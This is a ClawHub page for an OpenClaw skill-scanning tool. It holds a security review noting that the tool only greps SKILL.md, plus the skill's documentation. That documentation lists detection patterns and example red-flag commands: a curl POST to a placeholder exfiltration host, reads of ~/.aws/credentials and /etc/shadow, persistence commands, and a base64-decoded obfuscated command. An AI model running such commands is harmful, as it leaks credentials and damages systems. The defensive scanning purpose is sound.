ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Skill Security Scanner

v1.0.1

Scan OpenClaw skills for security risks, suspicious permissions, and provide a trust score to help evaluate skill safety before use or installation.

2· 825·6 current·7 all-time
byDevSef@steffano198
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
The name and description match the contained files: a scanner that inspects skills. However the shipped scanner is very lightweight and only greps SKILL.md and metadata; it does not actually scan code files, binaries, or perform dynamic analysis despite implying a full-skill audit and trust scoring. Asking no credentials and no special binaries is coherent for this purpose.
!
Instruction Scope
SKILL.md describes scanning strategies (network calls, credential reads, obfuscation) and example patterns, but the runnable script (scripts/scan-skill.sh) only searches the skill's SKILL.md for a handful of regexes and metadata lines. The documentation suggests examining full source and integrating with memory/other skills, but the automated checks do not analyze code files, dependencies, or runtime behavior — creating a risk of false negatives (malicious behavior hidden in other files) and false confidence.
Install Mechanism
No install spec and no external downloads; the repository is instruction-only with a small local shell script. This is low risk from an install perspective because nothing will be written or executed automatically on install. Running the included script executes only local greps and echoes.
Credentials
The skill requests no environment variables or credentials and does not attempt to read system files in the provided script. SKILL.md warns about sensitive files (e.g., ~/.aws/credentials) but only as examples of red flags. A small note: the docs recommend storing trust scores in 'memory' or reporting findings to other skills — that implies potential storage/sharing of scan results, but this is a user-level integration choice, not an automatic credential request.
Persistence & Privilege
always:false and normal model invocation settings are used. The SKILL.md suggests integrating with agent memory and other skills which could persist or share findings; that's not inherently malicious but users should be aware that trust scores and scan results might be stored or broadcast if they enable such integrations.
What to consider before installing
This skill is a useful, low-risk helper but be cautious: the automated script only inspects SKILL.md and metadata (it greps for network calls, env names, and markdown headings). It will miss malicious code in other files, hidden downloads, compiled binaries, or obfuscated scripts. Treat its trust score as a quick heuristic, not a definitive verdict. Before relying on it: (1) manually review code files (scripts, binaries, build/install steps), (2) run more comprehensive static-analysis tools across the whole skill directory, (3) sandbox test unknown skills (limited privileges/VM/container), and (4) avoid automatically sharing scan results to other services unless you trust those integrations. If the author/packaging is unfamiliar, prefer manual code review in addition to this scanner.

Like a lobster shell, security has layers — review code before you run it.

latestvk97e80j0txv0218rwsj71g0yb1819kf8
825downloads
2stars
2versions
Updated 9h ago
v1.0.1
MIT-0
DevSef@steffano198
latest
Download

Skill Security Scanner

Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score. Helps users make informed decisions about which skills to trust.

When to Use

  • Before installing a new skill from ClawHub
  • Auditing existing installed skills
  • User asks "is this skill safe?"
  • After ClawHavoc type incidents (malicious skills in ecosystem)
  • Before running untrusted skills

Quick Reference

CommandPurpose
scan-skill <path>Scan a single skill
scan-allScan all skills in workspace
trust-score <path>Get quick trust score (0-100)
list-permissions <path>List all requested permissions

Scanning Strategy

1. Check Metadata (Frontmatter)

Look for:

  • bins - CLI tools skill needs
  • env - Environment variables (API keys, tokens)
  • requires.config - Required config settings
  • requires.bins - Binary dependencies

Red flags:

  • Skills requesting many bins without clear purpose
  • Env vars for sensitive services (AWS keys, database passwords)
  • Config requiring admin/elevated permissions

2. Analyze SKILL.md Content

Suspicious patterns to detect:

# Network calls to unknown domains
grep -E "(curl|wget|http|https).*\.com" SKILL.md
grep -E "fetch\(|axios\(" SKILL.md

# File system access beyond declared scope
grep -E "rm -rf|dd |mkfs" SKILL.md

# Credential access
grep -E "password|secret|token|key" SKILL.md

# Execution of downloaded code
grep -E "eval\(|exec\(|system\(" SKILL.md

# Base64 encoded commands
grep -E "base64|-enc|-encode" SKILL.md

3. Trust Score Calculation

Score from 0-100 based on:

FactorWeightCriteria
Author reputation20%Known author? Official OpenClaw skill?
Permission scope30%Minimal bins/envs?
Code patterns25%No suspicious commands
Update frequency15%Recently updated?
Download count10%Popular = more scrutiny

4. Risk Levels

ScoreRiskAction
80-100🟢 LowSafe to use
60-79🟡 MediumReview before use
40-59🟠 HighUse with caution
0-39🔴 CriticalDon't use

Output Format

Scan Result

🔍 Skill: <skill-name>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 Trust Score: <score>/100 (<risk-level>)

📋 Permissions Requested:
   • bins: curl, jq
   • env: OPENWEATHER_API_KEY

⚠️ Issues Found:
   1. [MEDIUM] Requests network access but no clear purpose
   2. [LOW] No recent updates (6+ months)

✅ Positive Signs:
   • Official OpenClaw skill
   • Clear documentation

Trust Report

Generate a full report:

## Security Analysis: <skill-name>

### Score: <score>/100 (<risk-level>)

### Permissions Analysis
| Type | Requested | Risk |
|------|-----------|------|
| bins | curl, jq | Low |
| env | API_KEY | Medium |

### Code Pattern Analysis
- ✅ No suspicious execution patterns
- ✅ No credential access attempts  
- ⚠️ 2 network calls to external domains

### Recommendation
<RECOMMENDATION>

Common Red Flags

High Risk Patterns

  1. Network exfiltration

    # Example: sending data to unknown servers
# curl -X POST https://SUSPICIOUS-DOMAIN/exfil
# fetch("https://data-collector.DOMAIN")

  2. Credential harvesting

    # Example: reading credentials
# cat ~/.aws/credentials
# grep "password" /etc/shadow

  3. Persistence mechanisms

    # Example: auto-start, cron, systemd
# sudo crontab -l
# systemctl enable

  4. Obfuscated code

    # Example: base64 encoded commands
echo "c3VkbyByb20gL3J0ZiAv" | base64 -d

Medium Risk Patterns

  1. Excessive permissions - More bins/envs than needed
  2. No documentation - Unclear what skill does
  3. Outdated - No updates in 6+ months
  4. Third-party dependencies - Unknown npm/go packages

Green Flags

  1. ✅ Official OpenClaw skills (openclaw/skills)
  2. ✅ Clear, specific permissions
  3. ✅ Active maintenance (recent commits)
  4. ✅ Open source with clear code
  5. ✅ Known author with reputation

Workflows

Before Installing New Skill

# 1. Get skill path (ClawHub or local)
# 2. Run full scan
scan-skill /path/to/skill

# 3. Check trust score
trust-score /path/to/skill

# 4. Review issues
# 5. Decide: install / skip / investigate more

Regular Security Audit

# Weekly: scan all installed skills
scan-all

# Monthly: generate full report
# Save to .learnings/ for documentation

Quick Trust Check

# For quick decision
trust-score <path>

# If score < 60, do full scan
# If score < 40, don't use

Integration with Other Skills

  • Works with self-improving-agent - Log security findings
  • Use memory - Remember trust scores for known skills
  • Report findings to user before risky operations

Best Practices

  1. Always scan before installing untrusted skills
  2. Document scan results in .learnings/
  3. Share findings with community (anonymized)
  4. Update trust scores when vulnerabilities found
  5. Trust but verify - Don't rely solely on automated scanning

Examples

Example 1: Scanning Before Install

User wants to install "cool-new-skill" from ClawHub:

> scan-skill ./skills/cool-new-skill

🔍 Scanning: cool-new-skill
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 Trust Score: 72/100 (🟡 Medium)

📋 Permissions:
   • bins: none
   • env: none

⚠️ Issues:
   • No recent updates (8 months)
   • Unknown author

✅ Positives:
   • Clear documentation
   • Minimal permissions

💡 Recommendation: Safe to try, monitor usage

Example 2: Finding Malware

> scan-skill ./skills/suspicious-skill

🔍 Scanning: suspicious-skill
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 Trust Score: 23/100 (🔴 CRITICAL)

📋 Permissions:
   • bins: curl, base64
   • env: API_KEY, SECRET_TOKEN

🚨 CRITICAL ISSUES FOUND:
   1. Network exfiltration pattern detected
   2. Credential access attempt
   3. Obfuscated commands (base64)

💀 Recommendation: DO NOT USE - Potential malware

Example 3: Audit Report

> scan-all

📋 Scanning all skills in ~/.openclaw/workspace/skills/
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

✅ github: 95/100 (safe)
⚠️ todoist: 68/100 (review needed)
✅ self-improving-agent: 92/100 (safe)
🔴 unknown-skill: 34/100 (remove recommended)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Summary: 2 safe, 1 review, 1 remove

Related

  • ClawHavoc incident (Feb 2026) - 341 malicious skills
  • Agent Trust Hub - Third-party security tooling
  • OpenClaw Security docs: docs.openclaw.ai/gateway/security

Comments

Loading comments...